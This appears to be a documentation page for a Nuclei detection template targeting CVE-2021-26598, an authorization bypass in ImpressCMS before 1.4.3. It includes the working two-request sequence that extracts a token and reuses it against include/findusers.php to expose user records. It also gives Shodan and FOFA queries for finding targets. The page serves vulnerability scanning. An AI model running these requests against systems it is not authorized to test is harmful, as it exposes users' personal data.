ImpressCMS <1.4.3 - Incorrect Authorization
ID: CVE-2021-26598
Severity: medium
Author: gy741,pdteam
Tags: cve,cve2021,hackerone,impresscms,unauth,cms
Description
Section titled “Description”ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2021-26598
info: name: ImpressCMS <1.4.3 - Incorrect Authorization author: gy741,pdteam severity: medium description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability. reference: - https://hackerone.com/reports/1081137 - http://karmainsecurity.com/KIS-2022-03 - https://github.com/ImpressCMS - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-26598 cwe-id: CWE-287 epss-score: 0.03958 epss-percentile: 0.92001 cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: impresscms product: impresscms shodan-query: - http.html:"ImpressCMS" - cpe:"cpe:2.3:a:impresscms:impresscms" - http.html:"impresscms" fofa-query: body="impresscms" tags: cve,cve2021,hackerone,impresscms,unauth,cms
http: - raw: - | GET /misc.php?action=showpopups&type=friend HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 - | GET /include/findusers.php?token={{token}} HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
matchers-condition: and matchers: - type: word part: body_2 words: - 'last_login' - 'user_regdate' - 'uname' condition: and
- type: status status: - 200
extractors: - type: regex name: token group: 1 regex: - "REQUEST' value='(.*?)'" - 'REQUEST" value="(.*?)"' internal: true# digest: 490a00463044022056120ae3bb55126d6aada3374ade0b3e6f2aa4db631bef331f3cef98e0843f7402202e551df1b5fe2ae88ce38308ac18a254b2a1a64135ba8c473f0fa10c7871bb79:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-26598.yaml"